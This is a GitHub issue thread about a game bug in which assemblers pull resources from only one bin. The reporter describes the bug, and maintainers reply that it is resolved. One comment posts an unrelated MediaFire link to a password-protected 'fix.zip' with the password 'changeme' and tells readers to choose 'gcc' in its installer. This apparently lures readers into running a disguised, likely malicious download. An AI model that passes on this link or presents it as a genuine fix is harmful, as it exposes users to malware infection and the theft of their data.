### ISSUE TITLE
Assemblers taking resources from only 1 particular bin

### ISSUE THREAD

**Issue by KAMILEQ360** [Eggs-D-Studios/wos-issues#271]
### Guidelines

- [X] I checked for duplicate bug reports
- [X] I tried to find a way to reproduce the bug

### Version

Main (Production)

### What happened? What did you expect to happen?

I created a megafactory of grass extractors and cloth assemblers (60 extractors, 30 bins, 30 assemblers). Everything should work just fine, every assembler has a bin sourced to them which provides enough grass for sustainable production (1 cloth/s). Yet somehow, every assembler takes grass just from ONE bin, which stops the entire factory from working when it runs out. Obviously, the 2 grass won't be enough to supply over 30 assemblers, so it makes massive industrial megacomplexes usless. Before reporting this bug, I checked every way to make it stop, yet it seems that it is not caused by human error but the game.

### How can we reproduce this bug?

Place more than 20+ assemblers and bins, 1 bin and assembler per 2 extractors. Boot it up and it should take from 1 bin. (Not confirmed). Should be there a need and I'll provide footage (it may have to do something with the cache bug) My discord is kamileq360 https://streamable.com/usayun

### Frequency

Most of the time

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mawesome4ever** [comment]
#366 
Cache issue, will be fixed.

**Comment by Hexcede** [comment]
This is not a cache issue

**Comment by Hexcede** [comment]
But it is resolved
